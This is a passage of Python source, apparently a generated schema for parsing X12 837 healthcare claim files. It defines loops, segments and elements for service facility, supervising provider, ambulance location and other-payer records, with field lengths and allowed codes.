desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["PXC"], ), ), Element( "PRV03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "PRV04", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Composite( "C035", Properties( desc="Provider Specialty Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Element( "PRV06", Properties( desc="Provider Organization Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Rendering Provider Secondary Identification", position="2710", repeat="4", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310C = Loop( "2310C", Properties( desc="Service Facility Location Name", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Service Facility Location Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Service Facility Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Service Facility Location City, State, ZIP Code", position="2700", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Facility Location Secondary Identification", position="2710", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "PER", Properties( desc="Service Facility Contact Information", position="2750", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EX"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="N", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2310D = Loop( "2310D", Properties( desc="Supervising Provider Name", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Supervising Provider Name", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Supervising Provider Secondary Identification", position="2710", repeat="4", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2310E = Loop( "2310E", Properties( desc="Ambulance Pick-up Location", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Pick-up Location", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PW"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Pick-up Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Pick-up Location City, State, ZIP Code", position="2700", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2310F = Loop( "2310F", Properties( desc="Ambulance Drop-off Location", looptype="", position="2500", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Drop-off Location", position="2500", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["45"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="S", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Drop-off Location Address", position="2650", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Drop-off Location City, State, ZIP Code", position="2700", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2330A = Loop( "2330A", Properties( desc="Other Subscriber Name", looptype="", position="3250", repeat="1", req_sit="R", ), Segment( "NM1", Properties( desc="Other Subscriber Name", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["IL"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["II", "MI"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Other Subscriber Address", position="3320", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Other Subscriber City, State, ZIP Code", position="3400", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Subscriber Secondary Identification", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["SY"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330B = Loop( "2330B", Properties( desc="Other Payer Name", looptype="", position="3250", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Other Payer Name", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PR"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["PI", "XV"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Other Payer Address", position="3320", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Other Payer City, State, ZIP Code", position="3400", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "DTP", Properties( desc="Claim Check or Remittance Date", position="3450", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["573"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Secondary Identifier", position="3550", repeat="2", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["2U", "EI", "FY", "NF"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Prior Authorization Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Referral Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Claim Adjustment Indicator", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["T4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Other Payer Claim Control Number", position="3550", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F8"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330C = Loop( "2330C", Properties( desc="Other Payer Referring Provider", looptype="", position="3250", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Referring Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Referring Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330D = Loop( "2330D", Properties( desc="Other Payer Rendering Provider", looptype="", position="3650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Rendering Provider", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Other Payer Rendering Provider Secondary Identification", position="3550", repeat="3", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2330E = Loop( "2330E", Properties( desc="Other Payer Service Facility Location", looptype="", position="4650", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Other Payer Service Facility Location", position="3250", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), 